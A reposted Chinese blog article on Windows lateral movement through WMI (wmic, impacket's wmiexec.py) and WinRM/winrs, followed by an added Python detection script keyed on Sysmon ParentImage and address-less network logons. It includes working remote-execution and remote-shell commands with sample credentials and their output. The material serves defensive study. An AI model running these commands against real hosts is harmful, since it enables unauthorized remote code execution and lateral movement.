[SAFE-ID: JIWO-2024-3408] Author: ecawen Published: [2024-07-13]
Some examples of gathering information:
Run a command: wmic /node:ip /user:admin /password:pass process call create 'ipconfig'. The call succeeds, but nothing is echoed back:

    Executing (Win32_Process)->Create()
    Method execution successful.
    Out Parameters:
    instance of __PARAMETERS
    {
        ProcessId = 812;
        ReturnValue = 0;
    };

ReturnValue = 0 only tells you that the process was created on the remote host; its output stays there. wmiexec.py from impacket handles this in one go: it runs the command the same way, but redirects the output to a file on the ADMIN$ share and reads it back over SMB, which is where the SMB traffic below comes from.

    python wmiexec.py admin:password@ip [command]
    Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

    [*] SMBv2.1 dialect used
    [+] Target system is 192.168.138.141 and isFDQN is False
    [+] StringBinding: \\\\WEB[\\PIPE\\atsvc]
    [+] StringBinding: web[49154]
    [+] StringBinding: 192.168.138.141[49154]
    [+] StringBinding chosen: ncacn_ip_tcp:192.168.138.141[49154]
    [!] Launching semi-interactive shell - Careful what you execute
    [!] Press help for extra shell commands
    C:\>whoami
    web\administrator
Empire also has a WMI lateral-movement module. Because the logon comes in over SMB, a network logon from an unexpected source IP can be alerted on.

Windows Remote Management (WinRM)

Introduction

Environment

Practice

    Test-WSMan -ComputerName 192.168.138.141

    wsmid           : http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd
    ProtocolVersion : http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd
    ProductVendor   : Microsoft Corporation
    ProductVersion  : OS: 0.0.0 SP: 0.0 Stack: 2.0
    Invoke-Command -ComputerName 192.168.138.141 -ScriptBlock { query user } -Credential administrator

    USERNAME       SESSIONNAME   ID  STATE   IDLE TIME  LOGON TIME
    administrator  console        2  Active  none       2019/1/23 17:30

This runs query user on the target, but the command pops up a credential dialog, so it is unusable from a pure command-line session. (The dialog appears because -Credential was given a bare user name; passing a PSCredential object built in advance avoids it.)

    Enter-PSSession -ComputerName 192.168.138.141 -Credential administrator
    [192.168.138.141]: PS C:\Users\Administrator\Documents> ls

        Directory: C:\Users\Administrator\Documents

    Mode                LastWriteTime     Length Name
    ----                -------------     ------ ----
    d----         2018/12/27     15:47            SQL Server Management Studio Express
    d----         2018/12/27     15:47            Visual Studio 2005

This gives an interactive PowerShell on the target, but again pops up the logon dialog. WinRM's companion is winrs, the Windows Remote Shell, which avoids the awkward dialog. Examples:

    winrs -r:https://myserver.com command
    winrs -r:myserver.com -usessl command
    winrs -r:myserver command
    winrs -r:http://127.0.0.1 command
    winrs -r:http://169.51.2.101:80 -unencrypted command
    winrs -r:https://[::FFFF:129.144.52.38] command
    winrs -r:http://[1080:0:0:0:8:800:200C:417A]:80 command
    winrs -r:https://myserver.com -t:600 -u:administrator -p:$%fgh7 ipconfig
    winrs -r:myserver -env:PATH=^%PATH^%;c:\tools -env:TEMP=d:\temp config.cmd
    winrs -r:myserver netdom join myserver /domain:testdomain /userd:johns /passwordd:$%fgh789
    winrs -r:myserver -ad -u:administrator -p:$%fgh7 dir \\anotherserver\share

For instance, winrs -r:ip -u:admin -p:password cmd produces an interactive shell:

    winrs -r:192.168.138.141 -u:administrator -p:123456 cmd
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation. All rights reserved.

    C:\Users\Administrator>

The logon event, however, records no source IP, and a distinctive trait is that every command executed produces a fresh logon:

    Network Information:
        Workstation Name:       <computer name>
        Source Network Address: -
        Source Port:            -

In Sysmon, although a corresponding RuleName was configured, it did not match:

    Process Create:
    RuleName:
    UtcTime: 2019-01-30 03:54:36.759
    ProcessGuid: {0eedf899-1ffc-5c51-0000-0010ec105000}
    ProcessId: 1136
    Image: C:\Windows\System32\cmd.exe
    FileVersion: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
    Description: Windows Command Processor
    Product: Microsoft® Windows® Operating System
    Company: Microsoft Corporation
    CommandLine: C:\Windows\system32\cmd.exe /C cmd
    CurrentDirectory: C:\Users\Administrator\
    User: WEB\Administrator
    LogonGuid: {0eedf899-1ff7-5c51-0000-002010ff4f00}
    LogonId: 0x4fff10
    TerminalSessionId: 0
    IntegrityLevel: High
    Hashes: MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A
    ParentProcessGuid: {0eedf899-1ffc-5c51-0000-00100c0b5000}
    ParentProcessId: 2340
    ParentImage: C:\Windows\System32\winrshost.exe
    ParentCommandLine: C:\Windows\system32\WinrsHost.exe -Embedding

Even without a matching RuleName, the record itself carries the useful indicator: the child (cmd.exe) is unremarkable, but ParentImage is winrshost.exe with the command line WinrsHost.exe -Embedding. A rule keyed on ParentImage catches this regardless of which command the operator ran, and its LogonId (0x4fff10) ties the process back to the address-less logon event above.

Author: jjf012
Link: https://www.jianshu.com/p/66bfaaba5fdc
Source: 简书 (Jianshu)
Copyright belongs to the author. Contact the author for permission before commercial reproduction; credit the source for non-commercial reproduction.
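The two detection points made above, the SMB/WMI network logon that does carry a source IP and the WinRS logon that carries none plus a cmd.exe child of winrshost.exe, as one added example of the triage logic. This is added code, not from the jianshu article or from any tool it mentions. It keys on ParentImage rather than RuleName, which is what the page's Sysmon record shows is reliable. The sample records are constructed (the WinRS one is trimmed from the page's record, the others are invented); WmiPrvSE.exe as the parent of WMI-created processes and wsmprovhost.exe as the PowerShell-remoting host are assumptions from general knowledge, not facts stated on the page, as is the trusted-source list.

```python
"""Triage Sysmon Event ID 1 (process create) and Security 4624 (logon) records
for WMI / WinRS remote execution. Added example; not from the original page."""

import ntpath
from typing import Optional

# Parent images that, on a server, almost only ever spawn remotely requested commands.
# winrshost.exe comes from the page's own Sysmon record. WmiPrvSE.exe (the WMI provider
# host that services Win32_Process.Create) and wsmprovhost.exe (PowerShell remoting host)
# are assumptions from general knowledge, not stated on the page.
REMOTE_EXEC_PARENTS = {
    "winrshost.exe": "WinRS remote shell (winrs -r:<host> ... cmd)",
    "wmiprvse.exe": "WMI Win32_Process.Create (wmic /node, wmiexec.py)",
    "wsmprovhost.exe": "PowerShell remoting (Enter-PSSession / Invoke-Command)",
}

# Constructed sample records in the 'Field: value' text shape Sysmon renders.
SYSMON_WINRS = r"""
Process Create:
RuleName:
UtcTime: 2019-01-30 03:54:36.759
ProcessId: 1136
Image: C:\Windows\System32\cmd.exe
CommandLine: C:\Windows\system32\cmd.exe /C cmd
User: WEB\Administrator
LogonId: 0x4fff10
ParentProcessId: 2340
ParentImage: C:\Windows\System32\winrshost.exe
ParentCommandLine: C:\Windows\system32\WinrsHost.exe -Embedding
"""

SYSMON_WMI = r"""
Process Create:
UtcTime: 2019-01-30 03:55:10.001
ProcessId: 812
Image: C:\Windows\System32\ipconfig.exe
CommandLine: ipconfig
User: WEB\Administrator
LogonId: 0x500a21
ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
"""

SYSMON_BENIGN = r"""
Process Create:
UtcTime: 2019-01-30 03:56:00.000
ProcessId: 2000
Image: C:\Windows\System32\cmd.exe
CommandLine: C:\Windows\system32\cmd.exe
User: WEB\Administrator
LogonId: 0x3e7a1
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\Windows\Explorer.EXE
"""

# Constructed 4624 records, fields named as in the Security log's EventData.
LOGONS = [
    {"LogonType": "3", "TargetUserName": "Administrator", "WorkstationName": "WEB",
     "IpAddress": "-", "IpPort": "-"},                 # WinRS: no source address
    {"LogonType": "3", "TargetUserName": "Administrator", "WorkstationName": "KALI",
     "IpAddress": "192.168.138.1", "IpPort": "49812"},  # wmiexec.py over SMB/DCOM
    {"LogonType": "2", "TargetUserName": "Administrator", "WorkstationName": "WEB",
     "IpAddress": "127.0.0.1", "IpPort": "0"},          # console logon, not of interest
]


def parse_kv_block(text: str) -> dict:
    """Split a Sysmon text record into fields on the first ':' of each line,
    so paths such as C:\\Windows\\... keep their drive colon."""
    fields = {}
    for line in text.strip().splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def classify_process_create(event: dict) -> Optional[str]:
    """Return the remote-execution channel implied by ParentImage, or None.
    The child (cmd.exe) is ordinary; the parent (winrshost.exe) is the signal."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    return REMOTE_EXEC_PARENTS.get(parent)


def classify_logon(event: dict, trusted_sources: set) -> Optional[str]:
    """Triage a 4624 record. LogonType 3 is the network logon that SMB, WMI/DCOM
    and WinRM all produce; the page shows WinRS logons carry no source address."""
    if event.get("LogonType") != "3":
        return None
    src = event.get("IpAddress", "-")
    if src in ("-", ""):
        return "type-3 logon with no source address (WinRM/WinRS pattern)"
    if src not in trusted_sources:
        return f"type-3 logon from untrusted address {src}"
    return None


def triage(sysmon_texts, logon_events, trusted_sources):
    """Return (LogonId or user, finding) pairs for everything worth alerting on."""
    findings = []
    for text in sysmon_texts:
        ev = parse_kv_block(text)
        hit = classify_process_create(ev)
        if hit:
            findings.append((ev.get("LogonId"), f"{ev.get('Image')} spawned via {hit}"))
    for ev in logon_events:
        hit = classify_logon(ev, trusted_sources)
        if hit:
            findings.append((ev.get("TargetUserName"), hit))
    return findings


if __name__ == "__main__":
    for who, what in triage([SYSMON_WINRS, SYSMON_WMI, SYSMON_BENIGN], LOGONS,
                            trusted_sources={"192.168.138.10"}):
        print(f"[{who}] {what}")
```

The LogonId carried by the Sysmon record is the join key: a process under winrshost.exe whose LogonId matches a 4624 with no source address is the winrs pattern the page describes, and because winrs logs one logon per command, a burst of such pairs from one account is the shape to alert on.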